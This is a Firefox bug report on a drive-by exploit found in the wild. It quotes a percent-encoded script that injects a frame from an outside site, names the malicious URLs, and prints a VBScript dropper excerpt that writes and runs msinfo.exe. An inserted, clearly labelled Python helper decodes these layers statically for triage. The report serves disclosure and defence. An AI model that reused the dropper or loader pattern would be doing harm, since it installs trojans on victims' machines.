Closed
Bug 275429
Opened 20 years ago
Closed 20 years ago
JRE 1.4.2_05 exploit in the wild
Categories
(Firefox :: General, defect)
RESOLVED
DUPLICATE
of bug 271559
People
(Reporter: jshpro2, Assigned: bugzilla)
Details
I believe I have found a possible exploit. While browsing the web I came across a page that caused several notifications from my virus scanner:

http://4arrowsoutfitters.com/crack/tradewinds/unlock/code/ (Go to the page at your own risk)

I noticed the line:

    var str="%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%72%62%33%37%2E%63%6F%6D%2F%63%6E%74%2F%70%72%6F%63%65%73%73%6F%72%3F%61%72%61%6C%65%6C%22%3E%27%29%3B";

in the JavaScript. Upon decoding that line, it was printing a frame to:

http://www.t058.com/inst/index.php?id=28129&c=Uji1i1ar0BI35vyd7nSV5v6JMUUFI0O3

This page appeared as if it was loading a Java class to run some trivial code. I found code that looked like it was running some sort of exploit using VBScript, JavaScript, and/or Java.

An excerpt of one of the VBScripts it was running is:

    h0 = ""
    i = 1
    Do While i < Len(c0)
        h0 = h0 & chr(cint("&h" & mid(c0, i, 2)))
        i = i + 2
    Loop
    set wsh = CreateObject("WScript.Shell")
    path = "C:\\"
    set fs = CreateObject("Scripting.FileSystemObject")
    set ts = fs.CreateTextFile(path + "msinfo.exe", true, false)
    ts.Write(h0)
    ts.Close()
    wsh.Run(path + "msinfo.exe")
    self.close()

It looks like they are downloading an executable to the victim's computer (trojan.bytedownloader)... I sent the code to a friend of mine and when he ran it, he got a Windows XP error that critical system files have been replaced with unknown files and that he needs to reinstall. I have tested this on my machine; I only get a notification from Norton that the file was prevented from downloading. It appears as if the author of the code has also implemented a counter to see how many computers have been infected. I do not intend to do any further investigation on my part.

The reason I am reporting this to Firefox instead of reporting it to Sun Microsystems or Microsoft is because Firefox should have some security measure in place to prevent code like this from even running. Firefox is known for their security and I would expect an exploit like this to affect IE only. I hope this issue is resolved shortly. I do not have the time or motivation to send this report to any other places, so if the correct place for me to contact was a virus center or something like that, you have permission to forward it on with my email address.

Regards,
Josh
jshpro2@gmail.com
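Added example, not part of the original report: a static triage helper in Python that decodes the two obfuscation layers described above without executing them, namely the percent-encoded `str` value and the hex-pair loop from the VBScript excerpt. `SAMPLE_C0` is a constructed stand-in because the report does not include the `c0` string, and all function names are illustrative.

```python
import re
from urllib.parse import unquote_to_bytes

# The str value quoted in the report, copied verbatim from the page.
PAGE_STR = (
    "%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%66%72%61%6D%65%20"
    "%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%72%62%33%37%2E%63%6F%6D"
    "%2F%63%6E%74%2F%70%72%6F%63%65%73%73%6F%72%3F%61%72%61%6C%65%6C%22%3E%27%29%3B"
)
# Constructed stand-in for c0 (not from the page): 16 bytes beginning with "MZ".
SAMPLE_C0 = "4D5A90000300000004000000FFFF0000"

def decode_percent_layer(s):
    """Decode a %XX-escaped script string to text; nothing is evaluated."""
    return unquote_to_bytes(s).decode("latin-1")

def extract_frame_urls(script):
    """Pull src targets out of frame/iframe tags written by the decoded script."""
    return re.findall(r"<i?frame[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", script, re.I)

def defang(url):
    """Make a URL non-clickable before it goes into a ticket or chat."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def decode_hex_layer(c0):
    """Static equivalent of the VBScript loop: two hex digits become one byte."""
    usable = len(c0) - (len(c0) % 2)  # the loop ignores a trailing odd digit
    return bytes(int(c0[i:i + 2], 16) for i in range(0, usable, 2))

def looks_like_pe(data):
    """Windows executables start with the two-byte DOS magic 'MZ'."""
    return data[:2] == b"MZ"

def triage(script_str, c0):
    """Decode both layers and summarize what an analyst needs to record."""
    decoded = decode_percent_layer(script_str)
    payload = decode_hex_layer(c0)
    return {
        "decoded_script": decoded,
        "frame_urls": [defang(u) for u in extract_frame_urls(decoded)],
        "payload_len": len(payload),
        "payload_is_pe": looks_like_pe(payload),
    }

if __name__ == "__main__":
    for key, value in triage(PAGE_STR, SAMPLE_C0).items():
        print(f"{key}: {value}")
```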
Comment 1•20 years ago
The t058.com site contains several exploit attempts aimed at IE (ms-its: protocol object, the VBScript downloader you quote, a suspicious .gif file), and a Java applet that apparently can take advantage of holes in Java at least up to JRE 1.4.2_05 (from other reports). There was a recently announced vulnerability in that JRE version; perhaps they use that.

Turning off Java will protect you. Upgrading to JRE 1.5 or 1.4.2_06 would protect you if the exploit uses the known hole in 1.4.2_05, but that's less clear.

I've seen a couple of other sites that loaded the same trojan-laden frame from t058.com.

Really a JRE bug, but our users don't care whose fault it is. We want to roll out a system to warn users about known vulnerabilities in 3rd party software.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Summary: Exploit in browser → JRE 1.4.2_05 exploit in the wild
Whiteboard: DUPEME
Comment 2•20 years ago
*** This bug has been marked as a duplicate of 271559 ***
Group: security
Status: NEW → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE